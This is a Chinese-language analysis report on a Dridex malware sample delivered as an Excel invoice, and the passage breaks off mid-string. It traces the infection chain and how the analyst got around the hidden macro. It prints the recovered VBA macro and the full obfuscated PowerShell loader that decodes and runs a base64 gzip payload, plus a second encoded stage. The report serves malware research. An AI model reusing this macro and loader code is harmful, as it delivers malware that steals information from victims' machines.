Dridex样本分析
Dridex分析报告
基本信息
| 样本名称 | INV_984748.xls |
|---|---|
| 样本类型 | excel |
| 恶意类型 | 蠕虫远控 |
| SHA256 | 7F8F24884E26B4B508D5147F8F54269E452D1200904323544EF36E30400190B1 |
| 样本名称 | t9ak0.dll |
|---|---|
| SHA256 | 076547c290c80627993690a9e6c15eeb2ac9b86a9a33af2d3dbaab135f1f43ab |
主要执行流程
excel打开启动宏,下载随机生成文件名的DLL,regsvr32.exe启动DLL,DLL为data段赋值之后,解密data段,data段运行生成shellcode,shellcode重新改写PE后,PE导出表出现DllRegister函数PE加载DllRegisterServer函数。
主要功能隐藏在该函数之中,分别为收集信息,联网发送数据,不过ip挂了一直没有响应
关键技术概览
宏隐藏
https://ratexcel.wordpress.com/2017/03/22/how-to-really-protect-your-code-making-vba-project-unviewable/利用如下方式对office宏进行了隐藏
powershell强混淆
powershell来源于单元格内的字符加密的生成的
之后powershell的混淆主要采用了格式化字符串,base64,deFLAteStREAM等混淆方式
异常触发
注册VEH向量触发int3异常,执行VEH,主要用来修改程序的执行流程
火绒剑分析
网络行为
有四个连接ip,但是没有后续行为,应该是ip挂了
注册表相关
遍历获取注册表值
详细分析
下载器
打开VBA宏 ,发现宏不可查看
尝试用EvilClippy去除隐藏属性
启动宏之后会崩溃,看不到VBA代码,不过可以用olevba dump一下得到VBA代码,且知道函数calculation_Layout是AutoExec类型
Private Sub calculation_Lbyout(ByVal Index As Long)
Debug.Print business(988377)
End Sub
Function business(l As Long)
Dim als As Range, pay As Range, price As String
Set als = Range("C192:HA310").SpecialCells(xlConstants)
For Each pay In als
price = price + Chr(pay + 1)
Next
On Error Resume Next: WScript.Quit = ("" & CreateObject((("WScript.Shell"))).Run((price), (0), (0))): WScript.Quit: MsgBox "": ActiveWorkbook.Close False
End Function
不过要调试,还是要打开代码窗口去调试·
宏代码可以大概理解成按一定格式压缩存放的,很多重复的字符串只会出现一次。
于是查找函数中的字符,找了好久,感觉这里像压缩的代码,修改函数名称layout为lbyout,这样就不会自动运行
此时再创建一个宏把代码重写一下,去调试那个宏。该宏将代码隐藏在表格之中进行解密执行VBS
wMIC "PrOCess" CALL CreaTe "pOWershELl -nOnIntERACTI -EXEcut bypaSS -WIn 000000000000000001 $J0P =([CHar]34).ToStrINg() ;SV 0L4 (([ChAr]44).ToStriNG() ) ;"\" `${0`Ai}= [type](${J0P}{1}{0}${J0P}-f 'Ert'${0L4}'CoNv') ; &(${J0P}{2}{1}{0}${J0P} -f'TeM'${0L4}'t-i'${0L4}'se') vArIABlE:H25341 ([TyPE](${J0P}{2}{3}{1}{6}{0}{5}{4}${J0P}-F'Ion.ComPresSIoNM'${0L4}'eS'${0L4}'iO.CoMP'${0L4}'R'${0L4}'E'${0L4}'oD'${0L4}'s') );&(${J0P}{0}{1}${J0P} -f 'n'${0L4}'al') ('Jf') (${J0P}{1}{0}{2}${J0P}-f 'je'${0L4}'New-Ob'${0L4}'ct') -F;.(${J0P}{0}{1}${J0P} -f 'n'${0L4}'al') ('fJ') (${J0P}{0}{1}${J0P} -f'i'${0L4}'ex') -F;`${g`Tr}=(${J0P}{48}{28}{42}{68}{80}{6}{77}{14}{23}{52}{54}{50}{76}{41}{21}{37}{15}{63}{73}{66}{8}{27}{75}{26}{51}{58}{56}{49}{45}{79}{25}{62}{64}{30}{70}{46}{34}{32}{40}{13}{17}{65}{18}{74}{7}{47}{84}{69}{4}{38}{61}{29}{10}{67}{59}{78}{85}{57}{0}{9}{72}{33}{43}{11}{39}{60}{20}{24}{36}{44}{1}{71}{83}{22}{55}{31}{35}{2}{53}{3}{82}{19}{5}{12}{81}{16}${J0P}-f'jmhyqE/UTLonXmw5'${0L4}'z62N9OElOPwzsT3T+Hxi73gksdv2LephraEUZCVHD+0Y4Rgbo8yYx6rOSTpUcE8d8LAT+CFvf+CThVZ9u'${0L4}'wA1'${0L4}'bZ96P56qfr9tsQPg1s9maZVIo+L4'${0L4}'I2ubB1XeI+7huY6DP'${0L4}'KM5clU82ovKYCk2hJighN5vYH5L5zcyUisVzdwQ2vZLMLc9NHL4Sl/qSxaI42E+1tN4c7pnyS+OvMGg6VWFt/t1+Ky2FnmTT0bLCrFilFk34/w+'${0L4}'BVw30NEsFMBFw'${0L4}'lwlhVx3C0'${0L4}'LJxen/Mj1zt3wHe4W2zB'${0L4}'WeItU7enz+99'${0L4}'0kPKIRIE'${0L4}'kL8WoApEK5L7aWvIqfIFBxvqQI0kdkMh5+k5wE3sV0jdZeCmkg85aWO8zDjxPv1nHZePU6r0HvV1tcLorZP80Jy8GSd'${0L4}'MTZz8Or+VsIeTizlrODrCfnvkBkfSrQBDHfjfGISWL6zS+47rz9tcRR0cd6y7gLUnD1LDDc13ljkQEBauBF0UM2SQJ+nMJ3xabfHcDW+DmewzLuvz1r3yLyargRhGwUaHfUoE1XPBmL'${0L4}'96Z1yJW+jg3Gi'${0L4}'g6EToZOhQDQQfAM4GagJ6Ed'${0L4}'x4lRMdk+AtFnN'${0L4}'/bbPr3or7///j/Asl6Z5BAAAA=='${0L4}'aH'${0L4}'xhC1FTnb01Fg3e7fopDk4l+Ly7CbS7GtZ8eiLxqpDSk/ZS1OjydsHwLmwYTh+ezZL1z0bqSTfHX27kK2zp/6Svlw8RJ8lwQhU82d5TWa/YWTJ08pnVbcD5RXKSv6kq9EtGpCCfT5SomVau4l69mYXHbrf6O0mGw/Jq92nS6Cd4M7k6JPEs/5dMx8/'${0L4}'WWgZMo5kqK5PgX4OsQ4fQlu5ZEiC1IHRAjHSZ5ErJgW9ZzXMFdSCrFAZu9ZTvO2vk8ZmeDLlce3GT+my4fkgxEVwTI5O7EoURifkA1PXydubGh1Gq+MNnllY70NXSPUReF7v3GxHhB5t611kVDjLj72KVagyxeB9ZXm4F57f9wDRjuvj'${0L4}'CxYXcSUm/X02n'${0L4}'1BHHZPC73fExzOep'${0L4}'fMRPyG1TQek7OH9jnLc'${0L4}'0JPQe'${0L4}'8j789kq++2MsSoMywBIWgXv5fzEFZHVfB2afRJew3Gt5H32RjHl4LV5ryhMeB7Rq8Lk2nva3NpqywbdgorKhlnZFPT7PWnN98PCVWLNe6C6d8dlapuhFex3wxRlLwbvusR2HQ+qHK5NEVXDU7XkoaWTld3y+LaROfHBhldYtZyKHaX5mXdSGBImUV43gKhfPcFEgxwOUwG64/x6+pf34ByWxO3sFT/MaLrtZ3vR1VK7dGAd8'${0L4}'726z/fIZ3q1rX2gNhq05ayqO7pnQ0eKFXgPtLj3asrCo8e6au0nxQueUWzKglHgVrxB1Gw/XPdC3'${0L4}'m23BUKOrJR4gVU9Il9celouLv+XMxePTVr7oJWxV3H8vP3JwQ2OYke1cy8HbVMlSptrhb32rgXEBKbjjsEXX'${0L4}'0IlJ5BW03r4j6UVTi45ZtStoRaG418uQYzPkeFJtVmTN7dNwk1JRV09hn0F71MwoC7vlIfL8gZWyv'${0L4}'ekF3MU'${0L4}'X8ZnH00c2LWrKo7IenTO5zt0jtTtWzviuuIHfuHhnsWY2Ue7lXtUZ3wD7JHFv+55R2SB8f'${0L4}'mqo9T0nPyql65SneiWj3vwynYzES3TNWxSdv/Gbjp+RXW+2j2vd04F3W02l/eYPqhBa1chOv/ZuS/3i0DrRrbjRD0w2T7mzYZ7Wu/DelQ6VQ2dhFamtKd27vWPDVXhXJB0s0RoUoUQQmT/fAhoSu0e1Cx0+'${0L4}'xWWuTe5A62w5Xt4FOOiFFOxiFb9PFs0M9BO1TS7ZWD22iUus5E+PjI2JrFrShBPOYBR0z144hQ6vZCpOj2VZf9SuviZc9ODmXBcVMPLKd3CDA'${0L4}'VSky2/2dgDaa+Cm'${0L4}'y8IZnbpU33aCg0+0q'${0L4}'2pGIO/Bq/X3BWrd/85ZsGiq/MdLoTfhQSgDkhcjD0TAvUqMDjqJyHXMvn2CZE0W3rDfEGNgM'${0L4}'ze2nwzB4800XLBljHrM37ukKDi7gaCl2+IM0oUMEhSkN4GG3usnS2IpZTdX0FQvHqKGYv221HJjPB1/CgMyNbCp3+Rx8CLiDLqrrFZuLBL3LfWkt5Fr64r7mPqtuMLeoUtCN9pQgcTZPlnjPyD/KyIf+afTiAMm9LhicZYrrhUwX9x1PluxRfR8KLtXKSkJz7LRb5b6I2do3cpJrcjy8aze9g378CFhL07Jm+OulSPWiHQNm/x/pBGOMiclq1jtEUQ2/QWPOQk4Szkg8ptxeLXdzF'${0L4}'V2K5N9UlOClia+qIdTX1YB95Wz0RTCmXa08/DbNey'${0L4}'Tzc0qFnZe7+BHYmuuh8gd44GeUQVGGMDN3rGkfTRO/piboS9rO+wI4pXpqRK7pLo'${0L4}'D5vD0WcKJqvMu'${0L4}'EcJYiEnr+1ehXoftF8hDY909xCGxME4b//hUzoQmgU8OHd6F7KN0DSEHXzsXfnUzTe4i'${0L4}'NLeeWf1n3IqwNcYFUuleMKhkljqWTaCpYP8UYZmi7MNlQbYHCNL/5nWJ2QrnhA20m+ltuzQHhsfGl+5thc1RFkIM82Sfj/bCStac4OtPOFsVkDN/PSjg8eUEtDQwRRCI6OHZx1ec9QoJcMkX+'${0L4}'opk+2uf7Luctl3UguyWJoHR7S7ngZE8lTOZNIEWVfP4r7cTFLS/YFgXgEbtsL9F/bIn3'${0L4}'+LWoDBgM1gZvDOZp5nDNx4/95StMOypMzUkZSSTqb/8++/zOuvv//973/9wTHsnz8k988fnP3nD8uDwoDyzx+C+ucPjQMVEBFAxAMzHJhxQEcCHQVqDshxYIMDHfiy0ByaYQSwJ4EA2BEQErRxUBga1BAe1DzAokAhgJyGOBgYDeQ'${0L4}'kHjTeNXpw/mAaHj0SsxtjvAZ4Ws'${0L4}'ZgoAxAInUxDJLBCNalC/7hP45qyliTvycC4YOsd'${0L4}'yJYLjuHJiaPKdSr0TzyxZYAVnQ7r4ChGQo9Srmq5PGEy+'${0L4}'VUFdAat4O9n2+2Mf/K8M+rAQ7qlqy94JTlsuFKLu'${0L4}'PvNvINkcc0P2baUjAOvt0iQYXUEKMCk/fpT7SJVAmdZI/gTYSsASlNaCWy'${0L4}'H4sIAAAAAAAEACVXyRKrOpL9l9q8'${0L4}'2LOM57kkk0+FhgmjlNZNvfB71VP3DnbPkeO'${0L4}'SMM6fyyJefY'${0L4}'t'${0L4}'RhUYv/863/zvx7rrMXeentKe/rG6ZHo0ugdhkhi/PU/f/Xf7UU42zMtTjP/'${0L4}'3fuXlgjHxdjzh0ruI3wABuaKbnNxWTXPnx7I1tTjG91363cx'${0L4}'DvcgivjyNmMx0zHqZB9pqVWuRB9baVnIrmBlG2Mf/yHkXZ'${0L4}'pQWr0tIMMKR3Wg9khHQQ1Bq8I'${0L4}'jwlPNqxD'${0L4}'Hf'${0L4}'xUNtr4BDVe2yfc5fZCbq5oiXkVA6Sa'${0L4}'gz5V9'${0L4}'pKPxvGRT87OH+XBLyVI1Id'${0L4}'gUg3iz9XaDCstWh9coXfO+M2SK3P+UZTGvemZdrbyF5ybJ8+FUX6StU8'${0L4}'1v+QvGX1iomENpMGVMfjrvMMGQ9UrsF2ouf8PkTf4C2xJZe0E/9jpDP3meCmgsFfNP0'${0L4}'rkPiTF'${0L4}'X78o2XqtsWfc2GrHCN4XgLmT6vcXi'${0L4}'ry2MXGV0'${0L4}'F/oeg'${0L4}'I0cnhYL/P7hiGt8fGSSJ6Z5R2vh2vGQv7kaiUfRc5qqGzVvpUrHOH7VmDQQ4V08VjSIHPWDGvcYz7eNzH3'${0L4}'cxINdaAPmoCEWbIOaAYWEfYDLA1wajCXBWBpMSgAbFq4NNOH'${0L4}'h4lxYSTOl'${0L4}'PUcn2SYbtKT98FVd'${0L4}'xHMohsa1RE27LpB/Ji0fzVXywKYlX'${0L4}'n7Ms8pCAIKgca9q9lqf0NNGEQKOqfzQUuDS4zGd'${0L4}'E6tC6163o0jeqWZkox'${0L4}'rs/cE/5a46pi0Ox9Dw+6sNKMOFOVWfiJi/BEJB3Teb/PZ8xW5y8efmJzv66qYS9ivuh9KZmiZ46gt'${0L4}'kOLQK3bKmtqy2h2ATi1evYCcoxGvfTQ1rfE2tsTO1b6q9GIso7qTX3tXgO'${0L4}'12XGvOtf/Di8t+xbrleIFw1mYIJPtrOZWT1FdgIHzo8iasyN74RZvGEf'${0L4}'00DAQlXAmFAn4RTg5qHQGAqD'${0L4}'OlDWpjklAQiaXIT5UITSHPzmEn63l/lYBp+a'${0L4}'A0/m'${0L4}'SQAUmoCASsCBgHwhouAJQs1AJ5BToM6DmABoFVwJ3BqbnoB6gQhPwBVoGSBmIAqQ8FMN1QHQ4'${0L4}'SE+1F1yM34TD2c8vXy/FXqmc31JOVkTh1c3RObP'${0L4}'Lw'${0L4}'1N'${0L4}'oMn6/YNvn0n8Fj3tyeEcyXsQyG0MZtbYE3o45pccB2lTllLY7XMpDBb5LY8+GN4hP'${0L4}'Wt+gT75rk3mO/Bpa6G36tU9wofsQoa/FbpMhk79qovTkcd7coQzebd0ue');function N`z(`${V`z}){.('fJ') (.('Jf') (${J0P}{2}{0}{3}{1}${J0P}-f '.St'${0L4}'ader'${0L4}'IO'${0L4}'reamRe')(.('Jf') (${J0P}{4}{6}{3}{2}{0}{1}{5}${J0P} -f 'on.GZipSt'${0L4}'re'${0L4}'ressi'${0L4}'p'${0L4}'I'${0L4}'am'${0L4}'O.Com')((&('Jf') (${J0P}{2}{0}{1}{3}${J0P} -f'.Memory'${0L4}'Stre'${0L4}'IO'${0L4}'am') -A @(${0L4} `${0`AI}::(${J0P}{0}{1}{2}${J0P}-f'FromB'${0L4}'ase64Str'${0L4}'ing').Invoke(`${v`Z})))${0L4} (.(${J0P}{0}{1}${J0P}-f'I'${0L4}'TeM') VARIaBLe:h25341 ).VaLUe::${J0P}DEc`Om`preSS${J0P}))).(${J0P}{0}{1}${J0P}-f'ReadT'${0L4}'oEnd').Invoke()};.('Nz')(`${G`Tr})"\"| &( $SheLLid[1]+$shEllid[13]+'X')"
${0L4}=,“ $JOP为" 化简一下 再化简pworershell的格式化字符串和转义字符`
nal是创建别名
$J0P =([CHar]34).ToStrINg() ;
SV 0L4 (([ChAr]44).ToStriNG() ) ;
"\" ${
0Ai}= [type]("CoNvErt") ;
&("set-iTeM") vArIABlE:H25341 ([TyPE]("iO.CoMPReSsIon.ComPresSIoNMoDE") );
&("nal") ('Jf') ("New-Object") -F;
.("nal") ('fJ') ("iex") -F;
${
gTr}=("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");
function Nz(${
Vz})
{
.('iex') (.('New-Object') ("IO.StreamReader")(.('New-Object') ("IO.Compression.GZipStream")((&('New-Object') ("IO.MemoryStream") -A @(, ${
0AI}::("FromBase64String").Invoke(${
vZ}))), (.("ITeM") VARIaBLe:h25341 ).VaLUe::"DEcOmpreSS"))).(ReadToEnd).Invoke()
};
.('Nz')(${
GTr})"\"| &( $SheLLid[1]+$shEllid[13]+'X')
在进行解码函数Nz大概是这样
iex (.New-Object IO.StreamReader (.New-Object IO.Compression.GZipStream((New-Object IO.MemoryStream -A @(, ${0AI}::FromBase64String.Invoke(${vZ}))), (ITeM VARIaBLe:h25341 ).VaLUe::"DEcOmpreSS"))).(ReadToEnd).Invoke()
对VZ进行了base64编码,VZ又是GTR的参数,首先对GTR进行base64解密,解密之后是一个Gzip文件再进行解压得到
.('Nz')(("{100}{38}{17}{79}{76}{7}{24}{51}{39}{26}{90}{18}{87}{34}{47}{86}{11}{10}{0}{71}{30}{102}{93}{74}{29}{73}{13}{65}{16}{75}{98}{48}{23}{56}{101}{5}{81}{1}{105}{97}{52}{95}{92}{62}{32}{94}{99}{53}{36}{50}{25}{77}{3}{27}{8}{2}{44}{106}{28}{22}{55}{12}{72}{46}{45}{66}{89}{43}{54}{41}{82}{40}{6}{4}{49}{61}{68}{20}{96}{42}{9}{104}{15}{88}{57}{107}{59}{78}{37}{80}{69}{35}{19}{91}{63}{84}{14}{58}{85}{83}{67}{70}{21}{31}{64}{33}{103}{60}"-f'JtrIYTtCKDvdZ15p2mdXZWW+cM','nbuP2RuKdgyNfboFVXX9hCr0Y6m6HqQxdhIiSD5xuhOO+vG0hlY0aUJAfmXcpr8H9+b9rYLLDkNZLa1gzUZYLOSTVAzj3d','aIv8e3ibA7X1om1cYihfMbX0O92LyB3lwlK7ZhquvBIVeCdcVMmvS8T','94f6eDq','4j91wnQc/','b2LymV','jR7wsHb7y9k4xjY3AwwxYxKYrDfWudon7E8FK','N/sL9g/C8E/8+/G6Me/vjj1/dcLn5q4zc7atPCr049Dr+zXFDpLXc2m6e1P/+RjN8a3492tG5LTmv/+fmHNXQ/X9z//P13sRhaEjv8C1vd','0u0/q2dEt','Sfi2jJgiBJCeuGdm2/fOkEqRM6yZoGQ7H6yeJm8qAj4Oj50aoIPjKXVV8KJcUUg3E0vi+gxLi7qekjOOlv','ql1iPvi+85+TlJkj5I9Q0sYRzlPidz6OMiF3bQvG','usFG4T','kGYs','5y0b1Dxk8FLKsNnHyIOrmVlH1SROUfZaW','f3/xir6ZRHhdGidkzl1TlYnA+30qxF','utnBoHlzo8+HTJuayvE7qK','i5D+yGx34kTGWxlpnVY8TMK3seqU0VMN114eernVwPjq8yrQU83p+ufARMTEcRHEjdAnK1cQE','XyR7R1/03','04SHOS92N61C1ykviFrFXU6nHljU','Mk/l8OimxmKk5XGOVTJ/gFnHd7','N0mitnqGTVKXYNEAMg1OYu3','evxSSz/ZufP/1PIlGN','Q6hY4a88zNWW7T3ICVIP9q1raYa','h0snALyLF+3KnU6Vj8WA1uILwnsGetztYTMC7iv029UA','RdLFP//I/ObyqUXhDzyEqjt3XnNb6mE+YsXzruXXywpbdpap7tCQU1ImKR','jHdDvCUoHAWOip7qwlFQDnsR5L2mt1Mno6erqfRu0TInSd','hR4f','00i3Itd5nSnRQA','TzXDx72lM42GXR','9yZA/W2vT4ls5WKTRL37keoIcla9ijiiVji','Yuy7lbw7J9whVnWgAFdHQETyyvEEgG2jmlp2YmhquUvs0lSnZ9OENMH9u6DpTq1ohD','P+Eoxk6P3I5V844fL0SzU276y//uenMBY','oihB6uFZc','/cUd50syufb7Sz2Ou+S','DFi6HDMh10dqBNG0nqY00MIvAqQS','O','6kwrZd0Qc4SWJ/kq5bhukxY','0pPLUuMQ84i23oEqQy6Tw0h7QqYXydmQBBcpWZKiAxTEs/OI','AB2Xx87sSHKFX+VfDNB9wZ5L','nUL0oMy0/tPT7sE/t0+7hB8ERLdMtuQvO5ckx8S48feCB57Pst1Xb/YHR3DKETddMkflJ','z0ooxwverDzFep4cfvRLuz+umQqnzDb8YoXasc02/IUrEtcrUk6EDTIhKijlo4TgGt3wDzkLO5OOlQyJd2l6lQkXn7CQgm/vC5uCEMJDTjSKS2/mASr3pU32Kjwzr9YJzarn2Utj1HGM57FvWx5gOde2ydH6s9q8X1cB3RNRZZyKY7iywYowBkFzzik7z2rz5vsh6gn6xVjOSGdt','CWWTCp9k2fY59peIsg6R1uCXAH','iY/A6fndwBQ2dGWRcvX','9K','v','AlD3g53jZwE','6cUl/yQqR8RDTJ2+CpVr7Mvc5oxrPEYVdkhhDWmvrhAoO3bhxnVoZW1pxh46WqHp4Q3s7jjh1U1UM0BU6ouR95yh','AiyFDKdgrBwSAk00lO5LqSAwZe8u','qKrC54I8Z5E5Tu3nDRQU5yGGDbDirrzMavpN1','ltHBp+txmRabomRDmvulp1LGUVUgT1TO6NeaIChvXje9k','+sUzFfm2eVMbac9+I2q2dkEWxOPNbZ','bkU1h2cKeOTxPJSNYAfK8jGfpB8Ok4etIbiSAxWZCg0E','gDz90ck+rekotYn0U1nkY8wX','GLqa3O0DRh2+DIEkXfAkVDrkJr35FnzhoNMUhQIUg/K9mlcrFxrPlO/CiPmJWJESF','CgLE3WRjPjgyREpFcxWr3FOLEk9ZRBN8/U2j6dvcTYORecTsqmvdKbFvreeXT+V224f0klvjEqdyN/c2/XinJk45vs1E9eEVZv','OhCLM4','qQiVD9NMPjdJRam8qxnGY8uRAapI','3zGMiVB4VEniul3zgUA6+pjxEXDHo+XRKURVCBnHN','3gTdO','mOs7Tapo995Z7RS7YdOnTJ5uzlVySt3','df3z6+d/f/22c5rbjHzg/vz59X/kn6kCWQ0AAA==','YSN','/uy7FMmPGbV+dW/SfpnSryBMZBtBDwQ','uUex8UvDA1lEX3Hpg71B1GY3UvrNK+ZaauiQZRpYHAosoi3IHWTCyaYi2ej9jWNncWzoxzt3FrTpBd8','+Zt//','JXPi0EjTKQ8tlIsuI','/BGu0OeqVnvFclNZJO1H2tfn','FmxzNIuMIg7bu0GGvgoTzzBltpx4hozuGBHMTHIcJIdqOeCfYCu3f2a0oPWil8H0xhNarv3Aoc6cGPC','Lzn26XoEWoqg','prPKUzTJ8R731QePYJNXqCvylz5isjS5VOxYFDXEwqghrBwBPik2HPzkTpBf7Xb+06ltOfWbkkZr2','RV//Pz66+ef','mds1a9aRHNE0kfZq2+9VenRaQTr52Df14','YFagT9sQs1DT9u0bkiolhd','7DRUWQY+26CJhe6JtNocdxiM','q0','VTWnUP/','B77ynp3VXQOpGBQOQ5J+P7/fPnz7/44fibNfp1yt','qx','zoZZXf1S5AOiIdeX1cTyOJ+p','lVjIN','i0eSCEm','Wl9nn','psGgqgsBOjKyl/eM/mHIIQl6V','mcS6u3U1p6Q0D7td22KEVD','Sx92yAmLgE4jdyGsvb4LBarfNTq','YgioPRhSgNVM9OuUNfgyRcIfAQE0OapaF1','YmCHKFUMBr/2gS','4u','oQ0JtmQABhDeFPVVgPn46pglbm4cr+9jYJgMH','AanP3xo9B+GpLSMuO1AvD8bjIcnS/zmmgFpdSlpP','z7g2URkWR0AEEwMp9J3at+UyfamA2MQ4Lf','Y0fGS4g9b1/Rbugb+I1glmS+h5q9efB9ms5u7rXZhBcCxeepymJQCTx1Ac7